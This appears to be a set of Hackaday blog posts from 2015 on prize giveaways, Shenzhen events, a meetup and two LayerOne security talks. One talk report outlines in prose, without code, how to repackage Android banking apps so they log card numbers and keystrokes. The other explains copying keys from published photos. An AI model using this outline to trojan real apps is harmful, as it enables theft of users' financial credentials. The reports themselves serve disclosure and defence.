$50k in Play: Awarding 65 Stickvise this Week

Pushing your circuit boards around the bench while trying to solder the components is a fools game. Clamp that board in place with a Stickvise you won from Hackaday! This week we’ll choose 65 projects to receive one of these PCB clamps. You must submit your project as a Hackaday Prize entry to be eligible. Do it now and you’ll be considered for our weekly prizes all summer long — they total $50,000 that we’re putting into your hands.

We’re particularly proud of the Stickvise story. It was posted as a project on Hackaday.io and immediately caught our eye as an interesting idea. We worked with [Alex Rich] as he made his way through the process of getting it ready for manufacturing and it just became available in the Hackaday Store.

Regarding your entry to win one: find a problem facing your community and start a project that helps to solve it. We’ve seen many great entries so far, but with so many prizes your chances of winning are still really good! We recommend adding a project log each week that discusses your progress and perhaps mentions what you would use the Stickvise for while progressing toward a working prototype. Even if you don’t think your idea can win one of the big prizes, a great idea and solid write up is definitely a contender for our $50k in Play weekly prizes. Just look at the projects that won last week:

Last Week’s 20 Winners of a Bulbdial Clock Kit

bulbdial-clock-50k-in-play-prize-blogview

Congratulations to these 20 projects who were selected as winners from last week. You will receive a Bulbdial Clock Kit. It takes the concept of a sundial and recreates it using different colors of LEDs for each hand of the clock. This is our favorite soldering kit. It ventures a bit away from our mission of awarding tools and supplies to help with your entry, but sometimes you just need to have some fun!

Each project creator will find info on redeeming their prize as a message on Hackaday.io.


The 2015 Hackaday Prize is sponsored by:

Hackaday Prize Worldwide: Shenzhen

That’s right, we’re headed to the epicenter of electronics manufacturing next month: Shenzhen, China. We have a ton planned and this is the quick and dirty overview to get you thinking. If you are in the area (or are itching to travel) join us for a week of hardware hacker culture. Highlights for our tour include:

  • Meet Up on June 18th – (RSVP details coming soon)
  • Zero to Product PCB Workshop on June 19th – RSVP Now
  • Hackaday Talks presented at Maker Faire Shenzhen on June 19th and June 21st
  • Hackaday Booth at MFSZ on June 20-21

Zero to Product Workshop at MakerCamp Shenzhen

shenzhen-makercamp-drawingMakerCamp brings 30 talented Makers, Hackers, Designers, and Engineers together for a few days to build a makerspace inside of a shipping container.

We won’t be part of that build team (registration is open until 6/1 if you want to be). We will be supporting the event as part of the workshops that help celebrate the completion of the space. A mobile hackerspace full of interesting tools is one thing. But the sharing of knowledge, experience, and skill is what truly makes a hackerspace work.

zero-to-product-workshop-LAOur Zero to Product workshop created by [Matt Berggren] has been generating a ton of buzz and will be offered at Shenzhen MakerCamp.

RSVP for the Workshop

The workshop runs from 10am to 6pm on Friday, June 19th on the grounds of Maker Faire: Shenzhen. The event covers PCB design and at the end you will have laid out a development board for use with the ESP8266 WiFi module.

We were totally sold out for the workshop in LA a few weeks ago this is another chance to join in. If Shenzhen is a bit too far for you to travel, we are also planning the next installment in San Francisco on June 13th.

2015-bamf-meetupHackaday Shenzhen Meetup

If you just want to hang out, so do we! On the night of Thursday, June 18th we’ll be rolling into an area bar for a tasty beverage and a night of interesting conversation. As always, we want to see the hardware you’ve been working on. We do recommend bringing things that fit easily in your pocket or backpack since we’re meeting up to spend some time with other Hackaday community members in the area.

We don’t have the location nailed down for this one. Check this post again as we’ll be adding it here. And if you have a bar to suggest to us please leave a comment below.

The picture above is from just a few weeks ago. We had a huge turnout for the BAMF meetup. There was a ton of hardware on hand which makes for really easy conversation as you meet other hackers for the first time.

Talks by [Mike] and [Sophi] plus Booth at Maker Faire Shenzhen

[Mike] is giving a talk on Friday, June 19th about the power of Open Design to move education forward. [Sophi] will be presenting her talk on Sunday, June 21st about making stuff that matters and working on research equipment used to investigate the world around us such as solar, medicine and disease.

Come to the Faire to hear our talks, but make sure you swing by the Hackaday booth as well. We’ll be bringing some of our most favorite projects to exhibit but we can’t resist the opportunity to do something interactive. Stop by and build an oscillator, wire up a sequencer, and create your own rudimentary music based on [Elliot Williams’] series Logic Noise.

Tag Along with Hacker Camp Shenzhen?

hcsz2015-thumbnailOne of the adventures we’ve always wanted to take part in is Hacker Camp Shenzhen which is run by Hackaday alumnus and Hackaday Prize Judge [Ian Lesnet]. The week-long camp leverages [Ian’s] knowledge of the area, manufacturers, markets, and people to provide tours and workshops for those interested in manufacturing. It just so happens that HackerCamp lines up the same week as all of the Hackaday events. We can’t take part in the entire thing, but are hoping that we have a free day to meet up (and possibly tag along) with the HackerCamp crew.


The 2015 Hackaday Prize is sponsored by:

The Ease of Adding Trojans to Major Financial Android Apps

This was both an amusing and frightening talk. [Sam Bowne] presented How to Trojan Financial Android Apps on Saturday afternoon at the LayerOne Conference. [Sam] calculates that 80-90% of the apps provided by major financial institutions like banks and investment companies are vulnerable and the ease with which trojans can be rolled into them is incredible.

Some Background

[Sam] did a great job of concisely describing the circumstances that make Android particularly vulnerable to the attacks which are the subject of the talk. Android programs are packaged as APK files which are easy to unpack. The “compiled” code itself is called smali and is readable in a similar way as Java. It’s super easy to unpack and search this byte code using grep. Once the interesting parts are located, the smali code can be altered and the entire thing can be repackaged. The app will need to be resigned but Google doesn’t control the signing keys so an attacker can simply generate a new key and use that to sign the app. The user still needs to install the file, but Android allows app installation from webpages, email, etc. so this isn’t a problem for the bad guys either.

The Attack

So what can be done? This is about information harvesting. [Sam’s] proof of concept uses a python script to insert logging for every local variable. The script looks at the start of every module in the smali code, grabs the number of local variables, increments it by one and uses this extra variable to write out the values through logcat.

bank-of-america-logcat
ADB Log shows the Credit Card Number

He demonstrated live on the Bank of America app. From the user side of things it looks exactly like the official app, because it is the official app. However, when you register your account the log reports the card number as you can see here. Obviously this information could easily be phoned-home using a number of techniques.

As mentioned, the vast majority of banking and financial apps are vulnerable to this, but some have made an attempt to make it more difficult. He found the Bancorp app never exposes this information in local variables so it can’t just be logged out. However, the same trojan technique works as a keylogger since he found the same function kept getting called every time a key is pressed. The same was true of the Capital One app, but it echos out Google’s Android keymap values rather than ascii; easy enough to translate back into readable data though.

The Inability to Report Vulnerabilities

bowne-schwab-twitter-security-reportWhat is the most troubling is that none of these companies have a means of reporting security vulnerabilities. It was amusing to hear [Sam] recount his struggle to report these issues to Charles Schwab. Online contact forms were broken and wouldn’t post data and several publicly posted email addresses bounced email. When he finally got one to accept the email he later discovered another user reporting on a forum that nobody ever answers back on any of the Schwab accounts. He resorted to a trick he has used many times in the past… Tweeting to the CEO of Charles Schwab to start up a direct-message conversation. This itself is a security problem as @SwiftOnSecurity proves by pointing out that whenever @SamBowne Tweets a CEO it’s because he found a vulnerability in that company’s platform and can’t find a reasonable way to contact the company.

There is Hope

Although very rare, sometimes these apps do get patched. The Trade King app was updated after his report and when [Sam] tried the exploit again it crashes at start-up. The log reports a verification failure. This indicates that the injected code is being noticed, but [Sam] wonders if the verification is included in the app itself. If it is, then it will be possible to track it down and disable it.

This may sound like all of us Android users should despair but that’s not the case. Adding verification, even if it’s possible to defeat it, does make the apps safer; attackers may not want to invest the extra time to try to defeat it. Also, there are obsfucators available for a few thousand dollars that will make these attacks much more difficult by making variable names unreadable. The free obsfucator available now with the Android development suites doesn’t change names of everything… local variables are left unaltered and programmers have a habit of using descriptive names for variables. For instance, BofA used “CARDNUM” in the example above.

The Slides

[Sam Bowne’s] slides and testing results for the entire talk are available under the “Upcoming Events” part of his website.

Pictures that Defeat Key Locks

We’re at LayerOne this weekend and one of the talks we were excited about didn’t disappoint. [Jos Weyers] presented Showing Keys in Public — What Could Possibly Go Wrong? The premise is that pictures of keys, in most cases, are as good as the keys themselves. And that pictures of keys keep getting published.

[Jos] spoke a bit about new services that offer things like 3D scanning and storage of your key for printing when you get locked out, or apps that ask you to take a picture of your key and they’ll mail you a duplicate. Obviously this isn’t the best of ideas; you’re giving away your passwords. And finding a locksmith is easier than findind a 3D printer. But it’s the media gaffs with important keys that intrigues us.

We’ve already seen the proof of concept for taking covert images to perfectly duplicate a key. But these examples are not so covert. One example is a police officer carrying around handcuff keys on a belt clip. Pose for a picture and that key design is now available to all. But news stories about compromised keys are the biggest offenders.

subway-keysA master key for the NYC Subway was compromised and available for sale. The news coverage not only shows a picture at the top of the story of a man holding up the key straight on, but this image of it on a subway map which can be used to determine scale. This key, which is still published openly on the news story linked above, opens 468 doors to the subway system and these are more than just the ones that get you onto the platform for free. We were unable to determine if these locks have been changed, but the sheer number of them has us thinking that it’s unlikely.

firemans-keysWorse, was the availability of fire-department master keys which open lock boxes outside of every building. (Correction: these are fire department keys but not the actual lock-box keys) A locksmith used to cut the original keys went out of business and sold off all their stock. These keys were being sold for $150, which is bad enough. But the news coverage showed each key on a white background, straight on, with annotations of where each type of key will work.

Other examples include video news stories about credit card skimmers installed in gas pumps — that coverage showed the key used to open the pump housing. There was also an example of speed camera control cabinet keys being shown by a reporter.

key-photo-duplication-layerone[Jos’] example of doing the right thing is to use a “prop” key for news stories. Here he is posing with a key after the talk. Unfortunately this is my own house key, but I’m the one taking pictures and I have blurred the teeth for my own security. However, I was shocked during image editing at the quality of the outline in the image — taken at 6000×4000 with no intent to make something that would serve as a source for a copy. It still came out remarkably clear.

Some locks are stronger than others, but they’re all meaningless if we’re giving away the keys.

See You at LayerOne this Weekend

LayerOne, the first level of security. [Brian Benchoff] and I are excited to take part in our first LayerOne conference this Saturday and Sunday in Monrovia California.

Anyone in the Los Angeles area this weekend needs to get out of whatever they have planned and try out this conference that has a soul. Get the idea of a mega-con out of your head and envision a concord of highly skilled and fascinating hackers gathering to talk all things computer security. Speakers will cover topics like researching 0day exploits, copying keys from pictures taken in public, ddos attacks, social engineering, and more.

It’s not just talks, there is a ton of hands-on at LayerOne as well. I plan to finally try my hand at lock picking. Yep, I’ve covered it multiple times and we’ve even had a session led by [Datagram] at the Hackaday 10th Anniversary but I’ve never found time to give it a roll. Of course electronics are my game and [Brian] and I will both be spending a fair amount of time in the hardware hacking village. We’ll have a bunch of dev boards along with us if you want to try out an architecture with which you’re unfamiliar. This year’s LayerOne badges are sponsored by Supplyframe; we’ll have something in store for the best badge hacks we see during the weekend.

See you there!

$50k in Play: 20 Bulbdial Clock Kits

For this week we’re veering away from our habit of giving away things to help with your build and giving away something fun. 20 Hackaday Prize entries will receive a Bulbdial Clock kit. Getting into the running is easy, start your project on Hackaday.io and make sure you officially submit it to the Hackaday Prize. Get it in by next Wednesday to be considered for this week’s prizes, and you’ll also be in the running each week after that as we work our way through $50,000 in prizes this summer before giving away the big stuff like a Trip into Space and $100,000 in cash.

The Bulbdial Clock has been a favorite of ours for years. Developed by Hackaday Prize Judges [Windell] and [Lenore] at Evil Mad Scientist Labs, it uses three rings of colored LEDs to cast shadows as clock hands. It’s a fun solder kit that will take time to assemble. In keeping with that ideal, your best bet at scoring one this week is to post a new project log showing off the solder work you’ve done on your prototype. If you don’t have one soldered yet, that’s okay too. Just post a new project log that talks about the component assembly you’ll be working on. This would be a great time to finally draw up a basic schematic, right?

Last Week’s 40 Winners of $50 Shapeways Gift Cards

50k-in-play-shapeways-blogview

Congratulations to these 40 projects who were selected as winners from last week. You will receive a $50 gift card from Shapeways so that you can get your custom parts 3D printed. We were on the lookout for projects that we thought would benefit most from custom parts. Some of these are far along in their development, some have just started, but all of them are awesome so browse the list and make sure to skull and follow the ones you like!

Each project creator will find info on redeeming their prize as a message on Hackaday.io.


The 2015 Hackaday Prize is sponsored by:

Hackaday BAMF Meetup Reaches Critical Mass and Overflows Awesome

I love the Hackaday crowd. Despite a long day standing at a booth or crawling the fairgrounds as a spectator, everyone still made it on Saturday night to the 2nd Annual Hackaday BAMF meetup and made it one for the annals of hacker history. Just look at that crowd… I see a couple of Hackaday Prize Judges, a friend I met in Germany (who I actually found out I first met at this same event last year), and many many more great people. I don’t want to spoil the fun so check out the full size over on [Rich Hogben’s] photo log and see how many you can identify.

We started this gathering last year as a come-as-you-are and bring-what-you’re-proud-of after party to Bay Area Maker Fair. We don’t rent out the bar — O’Neil’s Irish Pub in San Mateo — but we had a handshake agreement for drink tickets (thank you to Supplyframe for buying the first round for everyone) with the bartenders. The place feels like the perfect size, and before long we were packed into every available space. The ramp to the restroom area in the back was a gauntlet of conversation — enough room to walk by but you felt like you were interrupting people talking to those across from them.

The amount of hardware on hand was spectacular. Taking pictures of it was tough in the tight quarters. I got a look at the first prototype of the Pebble smart strap. I really enjoyed seeing OSHChip (pictured above) which is an ARM Cortex-M0 chip and BLE rolled into a DIP-16 form factor. [Sophi’s] HeartBeat Boombox was a big hit; it uses the heartrate and blood oxygen sensors seen above to drive a drumbeat. Those blinky glasses should look familiar. [Garrett Mace] and his colleague [Jason] were on hand. These Macetech glasses are from a couple of years back but don’t worry, they were sporting the newest RGB flavor which I’m told will have black solder mask and integrated controller among other tasty goodies.

Perhaps the best way to tell the success of the night is that there were a lot of friends in the room that I never realized were even there. The next day I met up with [Sarah Petkus] and [Mark Koch] and was surprised to find they had been at the Hackaday meetup and I missed them. The same thing happened when I looked at [Rich’s] album from the night and saw [Trey German] was there too. I wasn’t hiding and I wasn’t stuck in one conversation, it was just that kind of a party that makes the room feel like a TARDIS but somehow the night doesn’t last forever.

It’s hard to imagine BAMF without this Saturday gathering. If you missed it this year, add it to your calendar for next.